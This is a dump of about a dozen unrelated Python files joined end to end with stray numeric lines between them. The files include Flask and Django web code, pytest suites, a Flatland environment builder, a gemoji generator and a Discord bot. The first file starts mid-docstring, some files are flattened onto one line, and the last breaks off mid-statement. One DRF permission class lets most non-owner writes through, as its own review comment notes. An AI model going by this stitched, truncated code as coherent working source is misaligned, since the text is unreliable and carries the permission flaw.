Return True data: np.array filename: the name of the file, take care about '\\' data_format: please use the Python protocal to write data_format default: 'f4', float32 end: little endian 'l' or big endian 'b'? default: '', only when data_format is specified, end is effective dependency: numpy Note: we can also write two for loop to write the data using f.write(data[a][b]), but it is too slow """ if not isinstance(data, np.ndarray): print("Error write_raw_mat: input shoul be np.array") return False f = open(filename,'wb') if len(data_format)>0: if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype(data_format) temp_data = data.astype(datatype) else: temp_data = data temp_data.tofile(f,'') f.close() return True def f_write_htk(data,targetfile,sampPeriod=50000,sampKind=9,data_format='f4',end='l'): """ write_htk(data,targetfile, sampPeriod=50000,sampKind=9,data_format='f4',end='l') """ if data.ndim==1: nSamples, vDim = data.shape[0], 1 else: nSamples, vDim = data.shape if data_format=='f4': sampSize = vDim * 4; else: sampSize = vDim * 8; f = open(targetfile,'wb') if len(data_format)>0: if end=='l': data_format1 = '<i4' data_format2 = '<i2' elif end=='b': data_format1 = '>i4' data_format2 = '>i2' else: data_format1 = '=i4' data_format2 = '=i2' temp_data = np.array([nSamples, sampPeriod], dtype=np.dtype(data_format)) temp_data.tofile(f, '') temp_data = np.array([sampSize, sampKind], dtype=np.dtype(data_format2)) temp_data.tofile(f, '') if len(data_format)>0: if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype(data_format) temp_data = data.astype(datatype) else: temp_data = data temp_data.tofile(f, '') f.close() return True def read_dic(file_path): """ dic = read_dic(file_path) Read a json file from file_path and return a dictionary Args: file_path: string, path to the file Returns: dic: a 
dictionary """ try: data = json.load( open(file_path) ) except IOError: print("Cannot find %s" % (file_path)) sys.exit(1) except json.decoder.JSONDecodeError: print("Cannot parse %s" % (file_path)) sys.exit(1) return data def write_dic(dic, file_path): """ write_dic(dic, file_path) Write a dictionary to file Args: dic: dictionary to be dumped file_path: file to store the dictionary """ try: json.dump(dic, open(file_path, 'w')) except IOError: print("Cannot write to %s " % (file_path)) sys.exit(1) def file_exist(file_path): """ file_exit(file_path) Whether file exists """ return os.path.isfile(file_path) or os.path.islink(file_path)
8,015
2,704
import logging
import random
from typing import NamedTuple

from flatland.envs.malfunction_generators import malfunction_from_params
# from flatland.envs.rail_env import RailEnv
from envs.flatland.utils.gym_env_wrappers import FlatlandRenderWrapper as RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator

MalfunctionParameters = NamedTuple('MalfunctionParameters',
                                   [('malfunction_rate', float), ('min_duration', int), ('max_duration', int)])


def random_sparse_env_small(random_seed, max_width, max_height, observation_builder):
    """Build a small, randomly-parameterized sparse RailEnv.

    Starts from a seed-dependent size and, when environment generation fails,
    retries with a grid enlarged by 5 in each dimension until it exceeds
    (max_width, max_height).

    Args:
        random_seed: seed for both the RNG and the rail generator
        max_width: largest grid width to try
        max_height: largest grid height to try
        observation_builder: observation builder passed to RailEnv

    Returns:
        A RailEnv instance, or None when no size up to the limits worked.
    """
    random.seed(random_seed)
    size = random.randint(0, 5)
    width = 20 + size * 5
    height = 20 + size * 5
    nr_cities = 2 + size // 2 + random.randint(0, 2)
    nr_trains = min(nr_cities * 5, 5 + random.randint(0, 5))  # , 10 + random.randint(0, 10))
    max_rails_between_cities = 2
    max_rails_in_cities = 3 + random.randint(0, size)
    malfunction_rate = 30 + random.randint(0, 100)
    malfunction_min_duration = 3 + random.randint(0, 7)
    malfunction_max_duration = 20 + random.randint(0, 80)

    rail_generator = sparse_rail_generator(max_num_cities=nr_cities, seed=random_seed, grid_mode=False,
                                           max_rails_between_cities=max_rails_between_cities,
                                           max_rails_in_city=max_rails_in_cities)
    # new version:
    # stochastic_data = MalfunctionParameters(malfunction_rate, malfunction_min_duration, malfunction_max_duration)
    stochastic_data = {'malfunction_rate': malfunction_rate, 'min_duration': malfunction_min_duration,
                       'max_duration': malfunction_max_duration}

    # all agents move at one of four speeds with equal probability
    schedule_generator = sparse_schedule_generator({1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. / 4.: 0.25})

    while width <= max_width and height <= max_height:
        try:
            env = RailEnv(width=width, height=height, rail_generator=rail_generator,
                          schedule_generator=schedule_generator, number_of_agents=nr_trains,
                          malfunction_generator_and_process_data=malfunction_from_params(stochastic_data),
                          obs_builder_object=observation_builder, remove_agents_at_target=False)
            print("[{}] {}x{} {} cities {} trains, max {} rails between cities, max {} rails in cities. "
                  "Malfunction rate {}, {} to {} steps.".format(
                random_seed, width, height, nr_cities, nr_trains, max_rails_between_cities,
                max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration
            ))
            return env
        except ValueError as e:
            logging.error(f"Error: {e}")
            width += 5
            height += 5
            # BUG FIX: logging.info was called print-style with extra
            # positional args but no format placeholders; use lazy %-style.
            logging.info("Try again with larger env: (w,h): %s, %s", width, height)
    # BUG FIX: the first placeholder mistakenly interpolated max_height twice.
    logging.error(f"Unable to generate env with seed={random_seed}, max_width={max_width}, max_height={max_height}")
    return None
3,000
958
from rest_framework import permissions
from models import Bucketlist


class IsOwnerOrReadOnly(permissions.BasePermission):
    """
    Object-level permission to only allow owners of an object to edit it.
    """

    def has_object_permission(self, request, view, obj):
        """
        Read permissions are allowed to any request, so we'll always allow
        GET, HEAD or OPTIONS requests.  Write access to a Bucketlist is
        restricted to its creator.
        """
        if request.method in permissions.SAFE_METHODS:
            return True
        if isinstance(obj, Bucketlist):
            # only the user who created the bucketlist may modify it
            return obj.created_by == request.user
        else:
            # NOTE(review): returns the object itself rather than a boolean;
            # DRF treats any truthy value as "allowed", so most non-Bucketlist
            # objects pass this check -- confirm `return True` was intended.
            return obj
616
161
# -*- coding: utf-8 -*-
import json
import glob
import os
from . import config


def get_presets():
    '''Get a generator yielding (preset name, data) pairs'''
    for path in config.PRESETS_PATH:
        for preset_file in glob.glob(os.path.join(path, '*.json')):
            name = os.path.splitext(os.path.basename(preset_file))[0]
            # do not shadow the loop variable with the file handle
            # (the original `with open(f) as f` re-bound it)
            with open(preset_file, 'r') as fh:
                data = json.load(fh)
            yield name, data


def get_preset(name):
    '''Get a preset by name; returns None when no preset matches'''
    for n, s in get_presets():
        if name == n:
            return s


def find_preset(name):
    '''Find the path to a given preset; raises ValueError when missing'''
    for path in config.PRESETS_PATH:
        prospect = os.path.join(path, name + '.json')
        if os.path.isfile(prospect):
            return prospect
    # BUG FIX: the name was passed as a second exception argument instead of
    # being %-formatted into the message.
    raise ValueError('Could not find a preset named %s' % name)


def new_preset(name, data):
    '''Create a new preset from viewport state data

    :param name: Name of the preset
    :param data: Viewport state dict

    usage::

        import mvp
        active = mvp.Viewport.active()
        mvp.new_preset('NewPreset1', active.get_state())
    '''
    preset_path = os.path.join(config.PRESETS_PATH[0], name + '.json')
    with open(preset_path, 'w') as fh:
        fh.write(json.dumps(data))


def del_preset(name):
    '''Delete the named preset file if it exists'''
    preset_path = find_preset(name)
    if os.path.exists(preset_path):
        os.remove(preset_path)
1,438
492
# -*- coding: utf-8 -*- """Tests for Flask-CuttlePool.""" import pytest from flask import Flask # Find the stack on which we want to store the database connection. # Starting with Flask 0.9, the _app_ctx_stack is the correct one, # before that we need to use the _request_ctx_stack. try: from flask import _app_ctx_stack as stack except ImportError: from flask import _request_ctx_stack as stack import mocksql from flask_cuttlepool import (_CAPACITY, _OVERFLOW, _TIMEOUT, CuttlePool, FlaskCuttlePool, PoolConnection) @pytest.fixture def user(): return 'paul_hollywood' @pytest.fixture def password(): return 'bread_is_the_best' @pytest.fixture def host(): return 'an_ip_address_in_england' @pytest.fixture def user2(): return 'marry_berry' @pytest.fixture def password2(): return 'cake_and_margaritas' @pytest.fixture def host2(): return 'another_ip_address_in_england' def create_app(u, p, h): app = Flask(__name__) app.testing = True app.config.update( CUTTLEPOOL_USER=u, CUTTLEPOOL_PASSWORD=p, CUTTLEPOOL_HOST=h ) return app @pytest.fixture def app(user, password, host): """A Flask ``app`` instance.""" return create_app(user, password, host) @pytest.fixture def app2(user2, password2, host2): """A Flask ``app`` instance.""" return create_app(user2, password2, host2) def add_decorators(p): """Adds ping and normalize decorators to pool.""" @p.ping def ping(con): return True @p.normalize_connection def normalize(con): pass @pytest.fixture def pool_no_app(): """Pool with no app.""" p = FlaskCuttlePool(mocksql.connect) add_decorators(p) return p @pytest.fixture(params=[1, 2]) def pool_one(request, app): """Pool initialized with one app.""" if request.param == 1: # Pool initialized with app in __init__() only. pool = FlaskCuttlePool(mocksql.connect, app=app) elif request.param == 2: # Pool initialized with app in init_app() only. 
pool = FlaskCuttlePool(mocksql.connect) pool.init_app(app) add_decorators(pool) return pool @pytest.fixture(params=[1, 2]) def pool_two(request, app, app2): """Pool initialized with two apps.""" if request.param == 1: # Pool initialized with one app in __init__() and one app in # init_app(). pool = FlaskCuttlePool(mocksql.connect, app=app) pool.init_app(app2) elif request.param == 2: # Pool initialized with two apps in init_app() only. pool = FlaskCuttlePool(mocksql.connect) pool.init_app(app) pool.init_app(app2) add_decorators(pool) return pool def test_init_no_app(user, password, host): """Test FlaskCuttlePool instantiates properly without an app object.""" pool = FlaskCuttlePool(mocksql.connect, user=user, password=password, host=host) add_decorators(pool) assert isinstance(pool, FlaskCuttlePool) assert pool._cuttlepool_kwargs['capacity'] == _CAPACITY assert pool._cuttlepool_kwargs['overflow'] == _OVERFLOW assert pool._cuttlepool_kwargs['timeout'] == _TIMEOUT assert pool._cuttlepool_kwargs['user'] == user assert pool._cuttlepool_kwargs['password'] == password assert pool._cuttlepool_kwargs['host'] == host def test_init_with_app(app, pool_one, user, password, host): """Test FlaskCuttlePool instantiates properly with an app object.""" assert isinstance(pool_one, FlaskCuttlePool) assert pool_one._cuttlepool_kwargs['capacity'] == _CAPACITY assert pool_one._cuttlepool_kwargs['overflow'] == _OVERFLOW assert pool_one._cuttlepool_kwargs['timeout'] == _TIMEOUT def test_init_two_pools_one_app(app): """Test two pools can be used with one app object.""" pool1 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool1) pool2 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool2) assert pool1.get_pool() is not pool2.get_pool() def test_get_app_no_init(app): """ Tests the ``app`` is returned when ``app`` is only passed to pool ``__init__()``. """ pool = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool) # Test in app context. 
with app.app_context(): assert pool._get_app() is app # Test outside app context. assert pool._get_app() is app def test_get_app_multiple(pool_two, app, app2): """Tests the correct ``app`` is returned.""" with app.app_context(): assert pool_two._get_app() is app with app2.app_context(): assert pool_two._get_app() is app2 def test_get_app_no_app(): """Tests an error is raised when there is no app.""" pool = FlaskCuttlePool(mocksql.connect) add_decorators(pool) with pytest.raises(RuntimeError): pool._get_app() def test_get_pool(pool_two, app, app2): """Tests the proper pool is retreived.""" with app.app_context(): pool = pool_two.get_pool() # Ensure same pool is returned again. with app.app_context(): assert pool is pool_two.get_pool() # Ensure different pool for different app. with app2.app_context(): assert pool is not pool_two.get_pool() def test_get_pool_different_apps_and_pools(app, app2): """ Tests that connection pools are stored correctly for each pool, app pair. """ pool1 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool1) # Create another pool with a different app. The call to get_pool() by # pool1 should attempt to retrieve the pool set by pool2 and fail. 
pool2 = FlaskCuttlePool(mocksql.connect, app=app2) add_decorators(pool2) with app2.app_context(): with pytest.raises(RuntimeError): pool1.get_pool() def test_make_pool(app, user, password, host): """Tests _make_pool method.""" pool = FlaskCuttlePool(mocksql.connect) add_decorators(pool) p = pool._make_pool(app) assert isinstance(p, CuttlePool) con_args = p.connection_arguments assert con_args['user'] == user assert con_args['password'] == password assert con_args['host'] == host def test_get_connection(app, pool_one): """Test get_connection returns a connection.""" with app.app_context(): con = pool_one.get_connection() assert isinstance(con, PoolConnection) def test_connection_app_ctx(app, pool_one): """Tests the same connection is retrieved from the stack.""" with app.app_context(): con1 = pool_one.connection assert hasattr(stack.top, 'cuttlepool_connection') con2 = pool_one.connection assert con1 is con2 assert pool_one.connection is None def test_connection_after_close(app, pool_one): """Ensure connection property properly handles closed connections.""" with app.app_context(): con = pool_one.connection con.close() assert con is not pool_one.connection assert pool_one.connection.open def test_connection_multiple_app_ctx(app, pool_one): """ Tests connection property saves a different connection to coexisting app contexts. """ with app.app_context(): con1 = pool_one.connection with app.app_context(): con2 = pool_one.connection assert con1 is not con2 assert con1 is pool_one.connection def test_commit(app, pool_one): """Tests the commit convenience method.""" with app.app_context(): commit1 = pool_one.connection.commit() commit2 = pool_one.commit() assert commit1 is not commit2 assert commit1 == commit2 def test_commit_error(app, pool_one): """ Tests a RuntimeError is raised when there's no connection on the application context. """ with pytest.raises(RuntimeError): # Should raise error since there's no application context. 
pool_one.commit() with app.app_context(): with pytest.raises(RuntimeError): # Should raise error since there's no connection on the application # context. pool_one.commit() def test_cursor(app, pool_one): """Tests a cursor is returned.""" with app.app_context(): cur = pool_one.cursor() assert isinstance(cur, mocksql.MockCursor) def test_cursor_accepts_arguments(app, pool_one): """Tests a cursor can accept arguments.""" class SuperMockCursor(mocksql.MockCursor): pass with app.app_context(): cur = pool_one.cursor(cursorclass=SuperMockCursor) assert isinstance(cur, SuperMockCursor) def test_ping_decorator(app, pool_one): """Tests the ping decorator is used by the connection pool.""" ping_str = "Decorated ping" @pool_one.ping def ping(connection): return ping_str with app.app_context(): pool = pool_one.get_pool() assert pool.ping(None) is ping_str def test_normalize_connection_decorator(app, pool_one): """ Tests the normalize_connection decorator is used by the connection pool. """ @pool_one.normalize_connection def normalize_connection(connection): connection.append(1) con = [] with app.app_context(): pool = pool_one.get_pool() pool.normalize_connection(con) # Check if con is modified by normalize_connection. If it is that # means the callback was successfully used by the connection pool. assert len(con) == 1 assert con[0] == 1
9,539
3,052
from typing import List, Dict from ..utils.scoringHelpers import * def listToResult(l: List[int]) -> List[Dict[str, int]]: return [{"position": item} for item in l] class Test_countOccurancesOfPosition: def test_noData(self) -> None: assert occuracesOfPosition([], False) == 0 assert occuracesOfPosition([], -5) == 0 assert occuracesOfPosition([], 1) == 0 assert occuracesOfPosition([], 55) == 0 def test_noOccurances(self) -> None: assert occuracesOfPosition(listToResult([5, 4, 3, 2]), 1) == 0 assert occuracesOfPosition(listToResult([55, 66]), 1) == 0 assert occuracesOfPosition(listToResult([8, 9, 3, 7, 3]), 1) == 0 def test_occursInList(self) -> None: assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 1) == 1 assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 1) == 2 assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 1) == 3 assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 2) == 1 assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 2) == 1 assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 2) == 2 assert occuracesOfPosition(listToResult([5, 4, 3, 2, 10]), 10) == 1 assert occuracesOfPosition(listToResult([10, 2, 3, 10]), 10) == 2 assert occuracesOfPosition(listToResult([10, 10, 10, 2]), 10) == 3 class Test_calculateCourseStatistics: def test_noData(self) -> None: assert calculateCourseStatistics([]) == {} def test_oneResult(self) -> None: assert calculateCourseStatistics( [{"course": "red", "time": 5, "incomplete": False, "position": 1}] ) == {"red": {"average": 5, "standardDeviation": 0}} def test_twoResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, ] assert calculateCourseStatistics(results)["red"]["average"] == 6 assert ( round(calculateCourseStatistics(results)["red"]["standardDeviation"]) == 3 ) class Test_calculateCourseTop3Average: def test_noData(self) -> None: assert calculateCourseTop3Average([]) == 
{} def test_oneResult(self) -> None: assert ( calculateCourseTop3Average( [{"course": "red", "time": 5, "incomplete": False, "position": 1}] )["red"] == 5 ) def test_twoResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 6 def test_threeResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 12, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 def test_fiveResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 12, "incomplete": False, "position": 1}, {"course": "red", "time": 65, "incomplete": False, "position": 1}, {"course": "red", "time": 155, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 def test_fiveResultsRandomOrder(self) -> None: results = [ {"course": "red", "time": 12, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 155, "incomplete": False, "position": 1}, {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 65, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 class Test_getMultiplier: def test_runningStandardCourse(self) -> None: assert getMultiplier("M10", "YELLOW") == 1000 assert getMultiplier("W12", "ORANGE") == 1000 assert getMultiplier("M14", "LIGHT GREEN") == 1000 assert getMultiplier("W16", "GREEN") == 1000 assert getMultiplier("M18", "Brown") == 1000 assert getMultiplier("W20", "BLUE") == 1000 assert getMultiplier("M21", "BROWN") == 1000 assert 
getMultiplier("W35", "BLUE") == 1000 assert getMultiplier("M40", "BROWN") == 1000 assert getMultiplier("W45", "SHORT BLUE") == 1000 assert getMultiplier("M50", "SHORT BROWN") == 1000 assert getMultiplier("W55", "GREEN") == 1000 assert getMultiplier("M60", "BLUE") == 1000 assert getMultiplier("W65", "SHORT GREEN") == 1000 assert getMultiplier("M70", "GREEN") == 1000 assert getMultiplier("W75", "SHORT GREEN") == 1000 assert getMultiplier("M80", "SHORT GREEN") == 1000 def test_runningUp(self) -> None: assert getMultiplier("W10", "ORANGE") == 1200 assert getMultiplier("M12", "LIGHT GREEN") == 1200 assert getMultiplier("W14", "GREEN") == 1210 assert getMultiplier("M16", "BROWN") == 1210 assert getMultiplier("W18", "BLACK") == 1452 assert getMultiplier("M20", "BLACK") == 1200 assert getMultiplier("W21", "BLACK") == 1200 assert getMultiplier("M35", "BLACK") == 1200 assert getMultiplier("W40", "BROWN") == 1210 assert getMultiplier("M45", "BROWN") == 1100 assert getMultiplier("W50", "BROWN") == 1331 assert getMultiplier("M55", "SHORT BROWN") == 1100 assert getMultiplier("W60", "SHORT BLUE") == 1100 assert getMultiplier("M65", "BROWN") == 1331 assert getMultiplier("W70", "BLUE") == 1331 assert getMultiplier("M75", "GREEN") == 1100 assert getMultiplier("W80", "BLACK") == 1933 def test_badAgeClass(self) -> None: assert getMultiplier("W", "BROWN") == 1000 assert getMultiplier("M", "BROWN") == 1000 assert getMultiplier("WA", "BROWN") == 1000 assert getMultiplier("MWERR", "BROWN") == 1000 assert getMultiplier("", "BROWN") == 1000
6,516
2,416
import sys
from stiff.data.constants import UNI_POS_WN_MAP
from finntk.wordnet.reader import get_en_fi_maps
from finntk.wordnet.utils import pre_id_to_post, ss2pre


def lemmas_from_instance(wn, instance):
    """Look up WordNet lemmas for one annotated instance.

    Returns a ``(word, pos, lemmas)`` triple, where ``pos`` is the WordNet
    POS tag mapped from the instance's universal POS attribute.
    """
    surface = instance.attrib["lemma"]
    wn_pos = UNI_POS_WN_MAP[instance.attrib["pos"]]
    matches = wn.lemmas(surface, pos=wn_pos)
    return surface, wn_pos, matches


def write_lemma(keyout, inst_id, lemma):
    """Write one answer-key line (``<inst_id> <sense-id>``) to *keyout*.

    A missing lemma, or a lemma whose FiWN synset has no mapping into the
    English WordNet, is recorded with the "unknown" marker "U".
    """
    fi2en, _en2fi = get_en_fi_maps()
    guess = "U"
    if lemma is not None:
        fi_synset_id = ss2pre(lemma.synset())
        if fi_synset_id in fi2en:
            guess = pre_id_to_post(fi2en[fi_synset_id])
        else:
            # Keep the diagnostic on stderr so the key file stays clean.
            sys.stderr.write(
                "No fi2en mapping found for {} ({})\n".format(
                    fi_synset_id, lemma
                )
            )
    keyout.write("{} {}\n".format(inst_id, guess))
911
330
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from .config import _cfg, _cfgi

# Engine bound to the configured database URL.
engine = create_engine(_cfg('connection-string'))

# Thread-local session registry; commits and flushes are always explicit.
_session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)
db = scoped_session(_session_factory)

# Declarative base, with a convenience `.query` property on every model.
Base = declarative_base()
Base.query = db.query_property()


def init_db():
    """Create all tables for every model registered on ``Base``."""
    # Importing the models module registers each model class with Base's
    # metadata before create_all runs.
    import fosspay.objects
    Base.metadata.create_all(bind=engine)
553
175
import argparse
import os
from datetime import datetime

# Canonical upstream emoji database (github/gemoji project).
JSON_DB_FILE = 'https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json'


def format_entry(emoji):
    """Render one gemoji JSON record as a source line of the generated
    EMOJI_DB list.

    Kept at module level (rather than inline in generate()) so it can be
    unit-tested without network access.

    :param emoji: dict with 'aliases', 'emoji', 'tags' and 'category' keys.
    :return: one line of generated Python source, newline-terminated.
    """
    return '    Emoji({aliases}, "{emoji}", {tags}, "{category}"),\n'.format(**{
        'aliases': emoji['aliases'],
        'emoji': emoji['emoji'],
        'tags': emoji['tags'],
        'category': emoji['category'],
    })


def generate(path, dbname):
    """Download the gemoji JSON database and write it to *path*/*dbname* as a
    generated Python module defining EMOJI_DB (a list of Emoji namedtuples).

    :param path: directory to write into.
    :param dbname: file name of the generated module.
    :raises requests.HTTPError: if the download fails.
    """
    # Imported lazily so the formatting helper above stays importable even
    # where the third-party `requests` package is absent.
    import requests

    req = requests.get(JSON_DB_FILE)
    req.raise_for_status()
    data = req.json()

    path = os.path.join(path, dbname)
    # BUGFIX: the generated file contains raw emoji characters, so it must be
    # written as UTF-8 explicitly; with the platform default codec (e.g.
    # cp1252 on Windows) the original code raised UnicodeEncodeError.
    with open(path, 'w', encoding='utf-8') as file:
        file.write('### This is a generated file.\n')
        file.write('### Do not edit this file.\n')
        file.write('### Date: {0}\n'.format(datetime.now().isoformat()[:-7]))
        file.write('### This file is based on "{0}".\n'.format(JSON_DB_FILE))
        file.write('\n')
        file.write('from collections import namedtuple\n')
        file.write('\n')
        file.write('Emoji = namedtuple("Emoji", ["aliases", "emoji", "tags", "category"])\n')
        file.write('\n')
        file.write('EMOJI_DB = [\n')
        for emoji in data:
            # Some gemoji records (custom aliases) have no 'emoji' field.
            if 'emoji' in emoji:
                file.write(format_entry(emoji))
        file.write(']\n')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Generates the Emoji database.')
    parser.add_argument('--dir', default='.', help='Database location')
    parser.add_argument('--dbname', default='db.py', help='Database location')
    args = parser.parse_args()

    generate(args.dir, args.dbname)
1,600
522
from .Command import Command


class WWW(Command):
    """`www` subcommand: serve the bibliography over HTTP with Flask."""

    command = 'www'
    help = "Spin up http server"

    def set_args(self, subparser):
        """Register command-line options for this subcommand."""
        subparser.add_argument("--port", "-P", help="Port number to listen on",
                               type=int, default=5000)

    def run(self, args):
        """Build the Flask app, register all routes and block serving it."""
        import logging
        import mimetypes
        import os

        import flask
        import jinja2

        from ..Database import Database
        from ..HTMLBib import bibContext, authorNorm
        from ..Exceptions import UserException
        from ..Bibtex import unicodeNorm

        if not args.debug:
            # Silence werkzeug's per-request logging unless debugging.
            logging.getLogger('werkzeug').setLevel(logging.ERROR)

        # Warm the database once up front; each request re-opens it below.
        Database(dataDir=args.data_dir)
        flaskApp = flask.Flask("pdfs")
        flaskApp.jinja_env.trim_blocks = True
        flaskApp.jinja_env.lstrip_blocks = True
        flaskApp.jinja_loader = jinja2.PackageLoader("pdfs")

        def mkTagList(db):
            # HTML fragment linking every known tag; None when no tags exist.
            if db.tags:
                return ' '.join('<a class="tags" href="/tag/{0}">{0}</a>'.format(t)
                                for t in sorted(db.tags))

        def keySort(xs):
            # Stable ordering by citation key.
            return sorted(xs, key=lambda x: x.key())

        def doSearch(tag=None, text=None, author=None, title=None):
            """Build the template context for a bibliography view.

            At most one filter is honoured, in the order tag, text, author,
            title; with no filter the full sorted bibliography is returned.
            """
            db = Database(dataDir=args.data_dir)
            ctx = dict(article_dir=os.path.basename(os.path.dirname(db.dataDir)),
                       tags=mkTagList(db))
            if tag:
                ctx['entries'] = bibContext(keySort(filter(lambda x: tag in x.tags,
                                                           db.works)))
                ctx['search'] = "tag:" + tag
            elif text:
                entries, searchData = [], []
                for result in db.search(text, formatter="html"):
                    entries.append(result['entry'])
                    searchData.append(result)
                bctx = bibContext(entries)
                # Attach score/snippet info to each rendered entry.
                for c, r in zip(bctx, searchData):
                    c['searchTxt'] = dict(score=r['score'], frags=r['frags'])
                ctx['entries'] = bctx[::-1]
                ctx['search'] = "text:" + text
            elif author:
                def isAuth(e):
                    # Match against normalized surnames of authors and editors.
                    n, au, ed = set(), e.author(), e.editor()
                    if au:
                        n.update(authorNorm(x.split(', ')[0]) for x in au.split(' and '))
                    if ed:
                        n.update(authorNorm(x.split(', ')[0]) for x in ed.split(' and '))
                    return author in n
                matches = keySort(filter(isAuth, db.works))
                ctx['entries'] = bibContext(matches)
                ctx['search'] = "author:" + author
            elif title:
                def m(x):
                    return title.lower() in unicodeNorm(x.title()).lower()
                ctx['entries'] = bibContext(keySort(filter(m, db.works)))
                ctx['search'] = "title:" + title
            else:
                ctx['entries'] = bibContext(keySort(db.works))
            return ctx

        @flaskApp.route('/')
        def listFiles():
            return flask.render_template('bibliography.html', **doSearch())

        @flaskApp.route('/search')
        def searchFiles():
            query = flask.request.args.get('q', '')
            queryType = flask.request.args.get('t', '')
            if queryType == "text":
                ctx = doSearch(text=query)
            elif queryType == "author":
                ctx = doSearch(author=query)
            elif queryType == "title":
                ctx = doSearch(title=query)
            elif queryType == "tag":
                ctx = doSearch(tag=query)
            else:
                raise RuntimeError("got bad query {}:{}".format(queryType, query))
            return flask.render_template('bibliography.html', **ctx)

        @flaskApp.route('/author/<author>')
        def listFilesByAuthor(author):
            return flask.render_template('bibliography.html',
                                         **doSearch(author=author))

        @flaskApp.route('/tag/<tag>')
        def listFilesByTag(tag):
            return flask.render_template('bibliography.html',
                                         **doSearch(tag=tag))

        @flaskApp.route('/<key>.pdf')
        def getPdf(key):
            db = Database(dataDir=args.data_dir)
            try:
                pdfFile = next(filter(lambda x: x.key() == key, db.works)).files[0]
            except StopIteration:
                raise KeyError
            # BUGFIX: read via a context manager so the descriptor is closed;
            # the original open(...).read() leaked one handle per request.
            with open(os.path.join(db.dataDir, pdfFile), "rb") as fh:
                resp = flask.make_response(fh.read())
            resp.content_type = 'application/pdf'
            return resp

        @flaskApp.route('/attachment/<string:key>-<int:idx>.<string:ext>')
        def getAttached(key, idx, ext):
            db = Database(dataDir=args.data_dir)
            try:
                attFile = next(filter(lambda x: x.key() == key, db.works)).files[idx]
            except StopIteration:
                raise KeyError
            filePath = os.path.join(db.dataDir, attFile)
            # BUGFIX: same leak as getPdf — close the file deterministically.
            with open(filePath, "rb") as fh:
                resp = flask.make_response(fh.read())
            mime, _ = mimetypes.guess_type(filePath)
            resp.content_type = mime or 'application/octet-stream'
            return resp

        @flaskApp.route('/<key>.bib')
        def getBib(key):
            db = Database(dataDir=args.data_dir)
            e = db.find(key=key)
            resp = flask.make_response(e.bibtex)
            resp.content_type = 'text/plain'
            return resp

        try:
            flaskApp.run(port=args.port)
        except OSError as err:
            if 'Address already in use' in str(err):
                raise UserException("Port {} already in use.".format(args.port))
            else:
                raise
5,653
1,613
# スクリプト名:nessmado_function.py # バージョン:5.01 # 作成日:2019/03/xx # 最終更新日:2019/10/14 # 作成者:(へっへ) # スクリプト概要: # |キャラ対策チャンネル(大元)に「質問」から始まるメッセージを投稿すると、 # |各キャラ別の対策チャンネルに文言をコピーした上で、 # |大元のキャラ対策チャンネルと雑談チャンネルに周知メッセージを送る。 """更新履歴 2019/03/xx ver 3.0?覚えてない。 オブジェクト指向に沿ってクラス化。 2019/07/31 Ver 5.0 勇者追加。 2019/10/14 Ver 5.1 バンカズ追加。 NESS_SKILLクラス考慮。 """ # discordAPIモジュール from discord import message from discord import client from discord import channel # 自作モジュール from NMconfig import NMConfig class ChannelManager: def __init__(self): self.nmconfig = NMConfig() self.TOKEN = "" self.ZATSUDAN_CHANNEL_ID = "" self.CHARACTER_TAISAKU_ID = "" # 「対策」は英語で"counterplan"って言うらしいが分かりにくいので self.MATCH_CHANNEL_ID = "" self.TAISAKU_STAMP = "" self.NESS_SKILL_CHANNEL_ID = "" self.STARVED_MATCHING = "" self.MYCHARACTER = "" self.inputConfig() def inputConfig(self): self.TOKEN = self.nmconfig.TOKEN self.ZATSUDAN_CHANNEL_ID = self.nmconfig.ZATSUDAN_CHANNEL_ID self.CHARACTER_TAISAKU_ID = self.nmconfig.CHARACTER_TAISAKU_ID self.MATCH_CHANNEL_ID = self.nmconfig.MATCH_CHANNEL_ID self.TAISAKU_STAMP = self.nmconfig.TAISAKU_STAMP self.NESS_SKILL_CHANNEL_ID = self.nmconfig.NESS_SKILL_CHANNEL_ID self.STARVED_MATCHING = self.nmconfig.STARVED_MATCHING self.MYCHARACTER = self.nmconfig.MYCHARACTER def judgeNameContained(self, client, ch_name, content) -> bool: """ キャラクター名について、包括してしまっている名前はいい感じに振り分けしてくれる処理。 TO:DO本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。 """ if ch_name == 'マリオ': if ('ドクター' in content) or ('Dr' in content) or ('dr' in content): return False elif 